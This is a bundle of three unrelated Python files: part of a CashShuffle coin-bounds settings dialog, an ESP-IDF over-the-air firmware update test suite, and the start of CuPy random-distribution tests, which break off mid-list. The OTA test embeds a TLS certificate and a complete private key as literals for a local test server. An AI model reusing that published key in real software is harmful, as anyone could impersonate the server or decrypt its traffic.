vbox.addWidget(lbl)
hbox = QHBoxLayout()
hbox.addWidget(HelpLabel(_("Minimum coin:"),
_("Coins (UTXOs) below this amount will not be selected for shuffling.")))
self.minEdit = BTCAmountEdit(decimal_point=self._decimal_point,
parent=self)
hbox.addWidget(self.minEdit)
vbox.addLayout(hbox)
hbox = QHBoxLayout()
hbox.addWidget(HelpLabel(_("Maximum coin:"),
_("Coins (UTXOs) up to this amount will be selected for shuffling.")))
self.maxEdit = BTCAmountEdit(decimal_point=self._decimal_point,
parent=self)
hbox.addWidget(self.maxEdit)
vbox.addLayout(hbox)
self.maxEdit.textEdited.connect(self.clearErr)
self.minEdit.textEdited.connect(self.clearErr)
vbox.addStretch()
self.errLabel = QLabel("")
self.errLabel.setAlignment(Qt.AlignCenter)
vbox.addWidget(self.errLabel)
vbox.addStretch()
vbox.addLayout(Buttons(CancelButton(self),
EnterButton(_("Defaults"), self.default),
EnterButton(_("Apply"), self.apply),
))
self.resize(320,200)
self.fromConfig()
# DEBUG Qt destruction
destroyed_print_error(self)
def _decimal_point(self): return get_config().get('decimal_point', 8)
def _fmt_amt(self, amt): return format_satoshis_plain(amt, self._decimal_point())
def apply(self):
lower, upper = self.minEdit.get_amount(), self.maxEdit.get_amount()
if not lower or not upper or upper <= lower:
self.setErr(_("Invalid amount"))
return
hard_upper = BackgroundShufflingThread.hard_upper_bound()
if upper > hard_upper:
self.setErr(_("Upper limit is {}").format(self._fmt_amt(hard_upper)))
return
hard_lower = BackgroundShufflingThread.hard_lower_bound()
if lower < hard_lower:
self.setErr(_("Lower limit is {}").format(self._fmt_amt(hard_lower)))
return
if (lower, upper) != tuple(BackgroundShufflingThread.update_lower_and_upper_bound_from_config()):
pre = ''
if (lower, upper) == self._get_defaults():
BackgroundShufflingThread.reset_lower_and_upper_bound_to_defaults()
pre = _("Default values restored.\n\n")
else:
actual_lower, actual_upper = BackgroundShufflingThread.set_lower_and_upper_bound(lower, upper)
if (lower, upper) != (actual_lower, actual_upper):
pre = _("Actual amounts applied: {} and {}.\n\n").format(self._fmt_amt(actual_lower),
self._fmt_amt(actual_upper))
self.show_message(pre+_("Changes will take effect when the next shuffle round starts (usually within a few minutes)."))
self.accept()
def fromConfig(self):
lower, upper = BackgroundShufflingThread.update_lower_and_upper_bound_from_config()
self.minEdit.setAmount(lower)
self.maxEdit.setAmount(upper)
self.clearErr()
def _get_defaults(self): return BackgroundShufflingThread.DEFAULT_LOWER_BOUND, BackgroundShufflingThread.DEFAULT_UPPER_BOUND
def default(self):
lower, upper = self._get_defaults()
self.minEdit.setAmount(lower)
self.maxEdit.setAmount(upper)
self.clearErr()
def setErr(self, txt='', noerr=False):
txt = txt or ""
if noerr:
try: color = ColorScheme.DEFAULT._get_color(0)
except AttributeError: color = "#666666"
else:
try: color = ColorScheme.RED._get_color(0)
except AttributeError: color = "red"
self.errLabel.setText('<font color="{}">{}</font>'.format(color, txt))
def clearErr(self): self.setErr('', noerr=True)
# /CoinSelectionSettingsWindow
|
example_test.py
|
import http.server
import os
import random
import re
import socket
import ssl
import struct
import subprocess
from threading import Thread
import ttfw_idf
from tiny_test_fw import DUT
server_cert = '-----BEGIN CERTIFICATE-----\n' \
'MIIDWDCCAkACCQCbF4+gVh/MLjANBgkqhkiG9w0BAQsFADBuMQswCQYDVQQGEwJJ\n'\
'TjELMAkGA1UECAwCTUgxDDAKBgNVBAcMA1BVTjEMMAoGA1UECgwDRVNQMQwwCgYD\n'\
'VQQLDANFU1AxDDAKBgNVBAMMA0VTUDEaMBgGCSqGSIb3DQEJARYLZXNwQGVzcC5j\n'\
'b20wHhcNMjEwNzEyMTIzNjI3WhcNNDEwNzA3MTIzNjI3WjBuMQswCQYDVQQGEwJJ\n'\
'TjELMAkGA1UECAwCTUgxDDAKBgNVBAcMA1BVTjEMMAoGA1UECgwDRVNQMQwwCgYD\n'\
'VQQLDANFU1AxDDAKBgNVBAMMA0VTUDEaMBgGCSqGSIb3DQEJARYLZXNwQGVzcC5j\n'\
'b20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDhxF/y7bygndxPwiWL\n'\
'SwS9LY3uBMaJgup0ufNKVhx+FhGQOu44SghuJAaH3KkPUnt6SOM8jC97/yQuc32W\n'\
'ukI7eBZoA12kargSnzdv5m5rZZpd+NznSSpoDArOAONKVlzr25A1+aZbix2mKRbQ\n'\
'S5w9o1N2BriQuSzd8gL0Y0zEk3VkOWXEL+0yFUT144HnErnD+xnJtHe11yPO2fEz\n'\
'YaGiilh0ddL26PXTugXMZN/8fRVHP50P2OG0SvFpC7vghlLp4VFM1/r3UJnvL6Oz\n'\
'3ALc6dhxZEKQucqlpj8l1UegszQToopemtIj0qXTHw2+uUnkUyWIPjPC+wdOAoap\n'\
'rFTRAgMBAAEwDQYJKoZIhvcNAQELBQADggEBAItw24y565k3C/zENZlxyzto44ud\n'\
'IYPQXN8Fa2pBlLe1zlSIyuaA/rWQ+i1daS8nPotkCbWZyf5N8DYaTE4B0OfvoUPk\n'\
'B5uGDmbuk6akvlB5BGiYLfQjWHRsK9/4xjtIqN1H58yf3QNROuKsPAeywWS3Fn32\n'\
'3//OpbWaClQePx6udRYMqAitKR+QxL7/BKZQsX+UyShuq8hjphvXvk0BW8ONzuw9\n'\
'RcoORxM0FzySYjeQvm4LhzC/P3ZBhEq0xs55aL2a76SJhq5hJy7T/Xz6NFByvlrN\n'\
'lFJJey33KFrAf5vnV9qcyWFIo7PYy2VsaaEjFeefr7q3sTFSMlJeadexW2Y=\n'\
'-----END CERTIFICATE-----\n'
server_key = '-----BEGIN PRIVATE KEY-----\n'\
'MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDhxF/y7bygndxP\n'\
'wiWLSwS9LY3uBMaJgup0ufNKVhx+FhGQOu44SghuJAaH3KkPUnt6SOM8jC97/yQu\n'\
'c32WukI7eBZoA12kargSnzdv5m5rZZpd+NznSSpoDArOAONKVlzr25A1+aZbix2m\n'\
'KRbQS5w9o1N2BriQuSzd8gL0Y0zEk3VkOWXEL+0yFUT144HnErnD+xnJtHe11yPO\n'\
'2fEzYaGiilh0ddL26PXTugXMZN/8fRVHP50P2OG0SvFpC7vghlLp4VFM1/r3UJnv\n'\
'L6Oz3ALc6dhxZEKQucqlpj8l1UegszQToopemtIj0qXTHw2+uUnkUyWIPjPC+wdO\n'\
'AoaprFTRAgMBAAECggEAE0HCxV/N1Q1h+1OeDDGL5+74yjKSFKyb/vTVcaPCrmaH\n'\
'fPvp0ddOvMZJ4FDMAsiQS6/n4gQ7EKKEnYmwTqj4eUYW8yxGUn3f0YbPHbZT+Mkj\n'\
'z5woi3nMKi/MxCGDQZX4Ow3xUQlITUqibsfWcFHis8c4mTqdh4qj7xJzehD2PVYF\n'\
'gNHZsvVj6MltjBDAVwV1IlGoHjuElm6vuzkfX7phxcA1B4ZqdYY17yCXUnvui46z\n'\
'Xn2kUTOOUCEgfgvGa9E+l4OtdXi5IxjaSraU+dlg2KsE4TpCuN2MEVkeR5Ms3Y7Q\n'\
'jgJl8vlNFJDQpbFukLcYwG7rO5N5dQ6WWfVia/5XgQKBgQD74at/bXAPrh9NxPmz\n'\
'i1oqCHMDoM9sz8xIMZLF9YVu3Jf8ux4xVpRSnNy5RU1gl7ZXbpdgeIQ4v04zy5aw\n'\
'8T4tu9K3XnR3UXOy25AK0q+cnnxZg3kFQm+PhtOCKEFjPHrgo2MUfnj+EDddod7N\n'\
'JQr9q5rEFbqHupFPpWlqCa3QmQKBgQDldWUGokNaEpmgHDMnHxiibXV5LQhzf8Rq\n'\
'gJIQXb7R9EsTSXEvsDyqTBb7PHp2Ko7rZ5YQfyf8OogGGjGElnPoU/a+Jij1gVFv\n'\
'kZ064uXAAISBkwHdcuobqc5EbG3ceyH46F+FBFhqM8KcbxJxx08objmh58+83InN\n'\
'P9Qr25Xw+QKBgEGXMHuMWgQbSZeM1aFFhoMvlBO7yogBTKb4Ecpu9wI5e3Kan3Al\n'\
'pZYltuyf+VhP6XG3IMBEYdoNJyYhu+nzyEdMg8CwXg+8LC7FMis/Ve+o7aS5scgG\n'\
'1to/N9DK/swCsdTRdzmc/ZDbVC+TuVsebFBGYZTyO5KgqLpezqaIQrTxAoGALFCU\n'\
'10glO9MVyl9H3clap5v+MQ3qcOv/EhaMnw6L2N6WVT481tnxjW4ujgzrFcE4YuxZ\n'\
'hgwYu9TOCmeqopGwBvGYWLbj+C4mfSahOAs0FfXDoYazuIIGBpuv03UhbpB1Si4O\n'\
'rJDfRnuCnVWyOTkl54gKJ2OusinhjztBjcrV1XkCgYEA3qNi4uBsPdyz9BZGb/3G\n'\
'rOMSw0CaT4pEMTLZqURmDP/0hxvTk1polP7O/FYwxVuJnBb6mzDa0xpLFPTpIAnJ\n'\
'YXB8xpXU69QVh+EBbemdJWOd+zp5UCfXvb2shAeG3Tn/Dz4cBBMEUutbzP+or0nG\n'\
'vSXnRLaxQhooWm+IuX9SuBQ=\n'\
'-----END PRIVATE KEY-----\n'
def get_my_ip():
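# Connecting a UDP socket to a public address does not send any packets; it only makes the
# OS pick the outbound interface, whose local address we then read back via getsockname().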
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(('8.8.8.8', 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def get_server_status(host_ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
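# connect_ex() returns 0 when something is already listening on (host_ip, port); any other
# value is an errno, meaning the test server still needs to be started.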
server_status = sock.connect_ex((host_ip, port))
sock.close()
if server_status == 0:
return True
return False
def create_file(server_file, file_data):
with open(server_file, 'w+') as file:
file.write(file_data)
def get_ca_cert(ota_image_dir):
os.chdir(ota_image_dir)
server_file = os.path.join(ota_image_dir, 'server_cert.pem')
create_file(server_file, server_cert)
key_file = os.path.join(ota_image_dir, 'server_key.pem')
create_file(key_file, server_key)
return server_file, key_file
def https_request_handler():
"""
Returns a request handler class that handles broken pipe exceptions
"""
class RequestHandler(http.server.SimpleHTTPRequestHandler):
def finish(self):
try:
if not self.wfile.closed:
self.wfile.flush()
self.wfile.close()
except socket.error:
pass
self.rfile.close()
def handle(self):
try:
http.server.BaseHTTPRequestHandler.handle(self)
except socket.error:
pass
return RequestHandler
def start_https_server(ota_image_dir, server_ip, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
requestHandler = https_request_handler()
httpd = http.server.HTTPServer((server_ip, server_port), requestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
def start_chunked_server(ota_image_dir, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
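# Note: `openssl s_server -WWW` serves files relative to the current working directory;
# get_ca_cert() has already chdir'd into ota_image_dir, so the OTA binaries there become downloadable.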
chunked_server = subprocess.Popen(['openssl', 's_server', '-WWW', '-key', key_file, '-cert', server_file, '-port', str(server_port)])
return chunked_server
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_native_ota_example(env, extra_data):
"""
This is a positive test case, which downloads the complete binary file multiple times.
The number of iterations can be specified in the variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
server_port = 8002
# Number of times the application's operation is to be validated
iterations = 3
# File to be downloaded. This file is generated after compilation
bin_name = 'native_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if not get_server_status(host_ip, server_port):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
for i in range(iterations):
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
# Note: the daemon HTTPS server thread must keep serving for every iteration; threading.Thread
# has no close() method, so nothing needs to be shut down here.
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting OTA example', timeout=30)
dut1.reset()
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_native_ota_example_truncated_bin(env, extra_data):
"""
This test case validates the behavior of OTA when the binary file is truncated.
The application should return an error message in this case.
steps: |
1. join AP
2. Generate truncated binary file
3. Fetch OTA image over HTTPS
4. Check working of code if bin is truncated
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
server_port = 8002
# Original binary file generated after compilation
bin_name = 'native_ota.bin'
# Truncated binary file to be generated from original binary file
truncated_bin_name = 'truncated.bin'
# Size of the truncated file to be generated. This value can range from 288 bytes (Image header size) to the size of the original binary file
# truncated_bin_size is set to 64000 to reduce the time consumed by the test case
truncated_bin_size = 64000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if not get_server_status(host_ip, server_port):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=60)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
dut1.expect('native_ota_example: Image validation failed, image is corrupted', timeout=20)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_native_ota_example_truncated_header(env, extra_data):
"""
This test case validates the behavior of OTA when the headers of the binary file are truncated.
The application should return an error message in this case.
steps: |
1. join AP
2. Generate binary file with truncated headers
3. Fetch OTA image over HTTPS
4. Check working of code if headers are not sent completely
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
server_port = 8002
# Original binary file generated after compilation
bin_name = 'native_ota.bin'
# Truncated binary file to be generated from original binary file
truncated_bin_name = 'truncated_header.bin'
# Size of the truncated file to be generated. This value should be less than 288 bytes (Image header size)
truncated_bin_size = 180
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if not get_server_status(host_ip, server_port):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=60)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
dut1.expect('native_ota_example: received package is not fit len', timeout=20)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_native_ota_example_random(env, extra_data):
"""
This test case validates the behavior of OTA when random data is used as the binary file.
Magic byte verification should fail in this case.
steps: |
1. join AP
2. Generate random binary image
3. Fetch OTA image over HTTPS
4. Check working of code for random binary file
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
server_port = 8002
# Random binary file to be generated
random_bin_name = 'random.bin'
# Size of the random binary file. 32000 is chosen to reduce the time required to run the test case
random_bin_size = 32000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, random_bin_name)
fo = open(binary_file, 'wb+')
# The first byte of the binary file is always set to zero. If the first byte were generated
# randomly, it could happen to be 0xE9, which would result in failure of the test case.
fo.write(struct.pack('B', 0))
for i in range(random_bin_size - 1):
fo.write(struct.pack('B', random.randrange(0,255,1)))
fo.close()
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if not get_server_status(host_ip, server_port):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=60)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name)
dut1.expect('esp_ota_ops: OTA image has invalid magic byte', timeout=20)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_native_ota_example_chunked(env, extra_data):
"""
This is a positive test case, which downloads the complete binary file from the
chunked HTTPS server started with openssl s_server.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
# File to be downloaded. This file is generated after compilation
bin_name = 'native_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
chunked_server = start_chunked_server(dut1.app.binary_path, 8070)
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':8070/' + bin_name))
dut1.write('https://' + host_ip + ':8070/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting OTA example', timeout=30)
chunked_server.kill()
os.remove(os.path.join(dut1.app.binary_path, 'server_cert.pem'))
os.remove(os.path.join(dut1.app.binary_path, 'server_key.pem'))
if __name__ == '__main__':
test_examples_protocol_native_ota_example()
test_examples_protocol_native_ota_example_chunked()
test_examples_protocol_native_ota_example_truncated_bin()
test_examples_protocol_native_ota_example_truncated_header()
test_examples_protocol_native_ota_example_random()
|
test_generator.py
|
import functools
import os
import threading
import unittest
import numpy
import pytest
import cupy
from cupy import cuda
from cupy.cuda import runtime
from cupy.random import _generator
from cupy import testing
from cupy.testing import _attr
from cupy.testing import _condition
from cupy.testing import _hypothesis
from cupy_tests.random_tests import common_distributions
def numpy_cupy_equal_continuous_distribution(significance_level, name='xp'):
"""Decorator that tests the distributions of NumPy samples and CuPy ones.
Args:
significance_level (float): The test fails if p-value is lower than
this argument.
name(str): Argument name whose value is either
``numpy`` or ``cupy`` module.
Decorated test fixture is required to return samples from the same
distribution regardless of whether ``xp`` is ``numpy`` or ``cupy``.
"""
def decorator(impl):
@functools.wraps(impl)
def test_func(self, *args, **kw):
kw[name] = cupy
cupy_result = impl(self, *args, **kw)
kw[name] = numpy
numpy_result = impl(self, *args, **kw)
assert cupy_result is not None
assert numpy_result is not None
d_plus, d_minus, p_value = \
common_distributions.two_sample_Kolmogorov_Smirnov_test(
cupy.asnumpy(cupy_result), numpy_result)
if p_value < significance_level:
message = '''Rejected null hypothesis:
p: %f
D+ (cupy < numpy): %f
D- (cupy > numpy): %f''' % (p_value, d_plus, d_minus)
raise AssertionError(message)
return test_func
return decorator
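# Illustrative usage sketch (an assumption for clarity, not part of the original suite): the
# decorated fixture draws samples with whichever module is passed in as ``xp``, e.g.
#
#     @testing.fix_random()
#     class TestUniformDistrib(unittest.TestCase):
#         @testing.for_dtypes('fd')
#         @numpy_cupy_equal_continuous_distribution(0.05)
#         def test_uniform_ks(self, xp, dtype):
#             return _xp_random(xp, 'uniform')(size=2000, dtype=dtype)
#
# The decorator then runs the fixture once with xp=cupy and once with xp=numpy and compares
# the two sample sets with a two-sample Kolmogorov-Smirnov test.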
def _get_size(size):
# CuPy returns an ndarray of shape () even if size=None.
# cf. NumPy returns a Python scalar if size=None.
if size is None:
return ()
return cupy._core.get_size(size)
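# For illustration (the behaviour this helper accounts for, per the comment above):
#     numpy.random.standard_normal(size=None)  # -> Python float scalar
#     cupy.random.standard_normal(size=None)   # -> 0-d cupy.ndarray, .shape == ()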
class RandomGeneratorTestCase(common_distributions.BaseGeneratorTestCase):
target_method = None
def get_rng(self, xp, seed):
return xp.random.RandomState(seed=seed)
def set_rng_seed(self, seed):
self.rng.seed(seed)
def _xp_random(xp, method_name):
method = getattr(xp.random.RandomState(), method_name)
if xp == cupy:
return method
def f(*args, **kwargs):
dtype = kwargs.pop('dtype', None)
ret = method(*args, **kwargs)
if dtype is not None:
ret = ret.astype(dtype, copy=False)
return ret
return f
@testing.fix_random()
@testing.gpu
class TestRandomState(unittest.TestCase):
def setUp(self):
self.rs = _generator.RandomState(seed=testing.generate_seed())
def check_seed(self, seed):
rs = self.rs
rs.seed(seed)
xs1 = [rs.uniform() for _ in range(100)]
rs.seed(seed)
xs2 = [rs.uniform() for _ in range(100)]
rs.seed(seed)
rs.seed(None)
xs3 = [rs.uniform() for _ in range(100)]
# Random state must be reproducible
assert xs1 == xs2
# Random state must be initialized randomly with seed=None
assert xs1 != xs3
@testing.for_int_dtypes()
def test_seed_not_none(self, dtype):
self.check_seed(dtype(0))
@testing.for_dtypes([numpy.complex_])
def test_seed_invalid_type_complex(self, dtype):
with self.assertRaises(TypeError):
self.rs.seed(dtype(0))
@testing.for_float_dtypes()
def test_seed_invalid_type_float(self, dtype):
with self.assertRaises(TypeError):
self.rs.seed(dtype(0))
def test_array_seed(self):
self.check_seed(numpy.random.randint(0, 2**31, size=40))
def test_methods(self):
methods = [
cuda.curand.CURAND_RNG_PSEUDO_DEFAULT,
cuda.curand.CURAND_RNG_PSEUDO_MRG32K3A,
cupy.cuda.curand.CURAND_RNG_PSEUDO_MT19937,
cupy.cuda.curand.CURAND_RNG_PSEUDO_PHILOX4_32_10,
cupy.cuda.curand.CURAND_RNG_PSEUDO_MTGP32,
cupy.cuda.curand.CURAND_RNG_PSEUDO_XORWOW
]
for method in methods:
if (runtime.is_hip and
method == cupy.cuda.curand.CURAND_RNG_PSEUDO_MT19937):
# hipRAND fails for MT19937 with the status code 1000,
# HIPRAND_STATUS_NOT_IMPLEMENTED. We use `pytest.raises` here
# so that we will notice it once hipRAND implements MT19937,
# as the imperative `pytest.xfail` immediately rewinds the
# control flow and does not run the test.
with pytest.raises(KeyError) as e:
rs = cupy.random.RandomState(method=method)
assert e.value.args == (1000,)
continue
rs = cupy.random.RandomState(method=method)
rs.normal()
@testing.parameterize(*common_distributions.beta_params)
@testing.with_requires('numpy>=1.17.0')
@testing.gpu
@testing.fix_random()
class TestBeta(
common_distributions.Beta,
RandomGeneratorTestCase
):
pass
@testing.parameterize(
{'n': 5, 'p': 0.5},
{'n': 5, 'p': 0.0},
{'n': 5, 'p': 1.0},
)
@testing.gpu
@testing.fix_random()
class TestBinomial(RandomGeneratorTestCase):
# TODO(niboshi):
# Test soundness of distribution.
# Currently only reproducibility is checked.
target_method = 'binomial'
def test_binomial(self):
self.generate(n=self.n, p=self.p, size=(3, 2))
@testing.parameterize(
{'df': 1.0},
{'df': 3.0},
{'df': 10.0},
)
@testing.gpu
@testing.fix_random()
class TestChisquare(RandomGeneratorTestCase):
target_method = 'chisquare'
def test_chisquare(self):
self.generate(df=self.df, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_chisquare_ks(self, dtype):
self.check_ks(0.05)(
df=self.df, size=2000, dtype=dtype)
@testing.gpu
@testing.parameterize(
{'alpha': cupy.array([1.0, 1.0, 1.0])},
{'alpha': cupy.array([1.0, 3.0, 5.0])},
)
@testing.fix_random()
class TestDirichlet(RandomGeneratorTestCase):
target_method = 'dirichlet'
def test_dirichlet(self):
self.generate(alpha=self.alpha, size=(3, 2, 3))
def test_dirichlet_int_shape(self):
self.generate(alpha=self.alpha, size=5)
# TODO(kataoka): add distribution test
@testing.parameterize(*common_distributions.exponential_params)
@testing.gpu
@testing.fix_random()
class TestExponential(
common_distributions.Exponential,
RandomGeneratorTestCase
):
pass
@testing.parameterize(
{'dfnum': 1.0, 'dfden': 3.0},
{'dfnum': 3.0, 'dfden': 3.0},
{'dfnum': 3.0, 'dfden': 1.0},
)
@testing.gpu
@testing.fix_random()
class TestF(RandomGeneratorTestCase):
target_method = 'f'
def test_f(self):
self.generate(dfnum=self.dfnum, dfden=self.dfden, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_f_ks(self, dtype):
self.check_ks(0.05)(
self.dfnum, self.dfden, size=2000, dtype=dtype)
@testing.parameterize(*common_distributions.gamma_params)
@testing.gpu
@testing.fix_random()
class TestGamma(
common_distributions.Gamma,
RandomGeneratorTestCase
):
pass
@testing.parameterize(*common_distributions.geometric_params)
@testing.fix_random()
class TestGeometric(
common_distributions.Geometric,
RandomGeneratorTestCase
):
pass
@testing.parameterize(*common_distributions.hypergeometric_params)
@testing.fix_random()
class TestHypergeometric(
common_distributions.Hypergeometric,
RandomGeneratorTestCase
):
pass
@testing.gpu
@testing.fix_random()
class TestLaplace(RandomGeneratorTestCase):
target_method = 'laplace'
def test_laplace_1(self):
self.generate()
def test_laplace_2(self):
self.generate(0.0, 1.0, size=(3, 2))
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_laplace_ks_1(self, dtype):
self.check_ks(0.05)(
size=2000, dtype=dtype)
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_laplace_ks_2(self, dtype):
self.check_ks(0.05)(
2.3, 4.5, size=2000, dtype=dtype)
@testing.gpu
@testing.fix_random()
class TestLogistic(RandomGeneratorTestCase):
target_method = 'logistic'
def test_logistic_1(self):
self.generate()
def test_logistic_2(self):
self.generate(0.0, 1.0, size=(3, 2))
@_attr.slow
@_condition.repeat(10)
def test_standard_logistic_isfinite(self):
x = self.generate(size=10**7)
assert cupy.isfinite(x).all()
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_logistic_ks_1(self, dtype):
self.check_ks(0.05)(
size=2000, dtype=dtype)
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_logistic_ks_2(self, dtype):
self.check_ks(0.05)(
2.3, 4.5, size=2000, dtype=dtype)
@testing.gpu
@testing.parameterize(*[
{'args': (0.0, 1.0), 'size': None},
{'args': (10.0, 20.0), 'size': None},
{'args': (0.0, 1.0), 'size': 10},
{'args': (0.0, 1.0), 'size': (1, 2, 3)},
{'args': (0.0, 1.0), 'size': 3},
{'args': (0.0, 1.0), 'size': (3, 3)},
{'args': (0.0, 1.0), 'size': ()},
])
@testing.fix_random()
class TestLogNormal(RandomGeneratorTestCase):
target_method = 'lognormal'
def check_lognormal(self, dtype):
vals = self.generate_many(
self.args[0], self.args[1], self.size, dtype, _count=10)
shape = _get_size(self.size)
for val in vals:
assert isinstance(val, cupy.ndarray)
assert val.dtype == dtype
assert val.shape == shape
assert (0 <= val).all()
def test_lognormal_float(self):
self.check_lognormal(float)
def test_lognormal_float32(self):
self.check_lognormal(numpy.float32)
def test_lognormal_float64(self):
self.check_lognormal(numpy.float64)
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_lognormal_ks(self, dtype):
self.check_ks(0.05)(
*self.args, size=self.size, dtype=dtype)
@testing.parameterize(
{'p': 0.5},
{'p': 0.1},
{'p': 0.9},
)
@testing.gpu
@testing.fix_random()
class TestLogseries(RandomGeneratorTestCase):
target_method = 'logseries'
def test_logseries(self):
self.generate(p=self.p, size=(3, 2))
# TODO(kataoka): add distribution test
@testing.gpu
@testing.parameterize(*[
{'args': ([0., 0.], [[1., 0.], [0., 1.]]), 'size': None, 'tol': 1e-6},
{'args': ([10., 10.], [[20., 10.], [10., 20.]]),
'size': None, 'tol': 1e-6},
